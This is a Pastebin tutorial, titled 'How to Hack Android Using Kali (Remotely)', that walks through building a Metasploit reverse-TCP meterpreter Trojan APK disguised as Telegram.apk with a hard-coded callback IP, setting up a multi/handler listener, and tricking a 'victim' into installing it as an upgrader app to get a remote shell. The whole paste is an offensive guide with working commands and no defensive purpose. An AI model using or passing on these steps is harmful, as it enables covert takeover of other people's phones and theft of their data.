Chugii

😈How to Hack Android Using Kali (Remotely)😈

Mar 10th, 2019
77
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.59 KB | None | 0 0
  1. 😈How to Hack Android Using Kali (Remotely)😈
  2.  
  3.  
  4. This is a tutorial explaining how to hack android phones.
  5.  
  6. Step 1:
  7.  
  8. Open a terminal, and make a Trojan .apk
  9. You can do this by typing :
  10.  
  11. 'msfpayload android/meterpreter/reversetcp
  12. LHOST=95.108.142.138 R > /root/Desktop/Telegram.apk'
  13. (replace LHOST with your own IP)
  14.  
  15. You can also hack android on WAN i.e. through Interet by
  16. using your Public/External IP in the LHOST and by port
  17. forwarding (ask me about port forwarding if you have
  18. problems in the comment section)
  19.  
  20. Step 2: Open Another Terminal:
  21.  
  22. Open another terminal until the file is being produced.
  23. Load metasploit console, by typing : 'msfconsole'
  24.  
  25. Step 3: Set-Up a Listener:
  26.  
  27. After it loads(it will take time), load the multi-handler
  28. exploit by typing :
  29.  
  30. 'use exploit/multi/handler'
  31.  
  32. Set up a (reverse) payload by typing :
  33.  
  34. 'set payload android/
  35. meterpreter/reversetcp'
  36.  
  37. To set L host type :
  38.  
  39. 'set LHOST 192.168.0.4'
  40.  
  41. (Even if you are hacking on WAN type your private/internal IP here not the public/external)
  42.  
  43. Step 4: Exploit!
  44.  
  45. At last type: exploit to start the listener.
  46.  
  47. Copy the application that you made (Telegram.apk) from
  48. the root folder, to you android phone.
  49. send file ....
  50.  
  51. Let the Victim install the Upgrader app(as he would think
  52. it is meant to upgrade some features on his phone)
  53.  
  54. However, the option of allowance for Installation of apps from Unknown Sources should be enabled (if not) from
  55. the security settings of the android phone to allow the
  56. Trojan to install.
  57. And when he clicks Open...
  58.  
  59. Step 5: BOOM!
  60. There comes the meterpreter prompt
Add Comment
Please, Sign In to add comment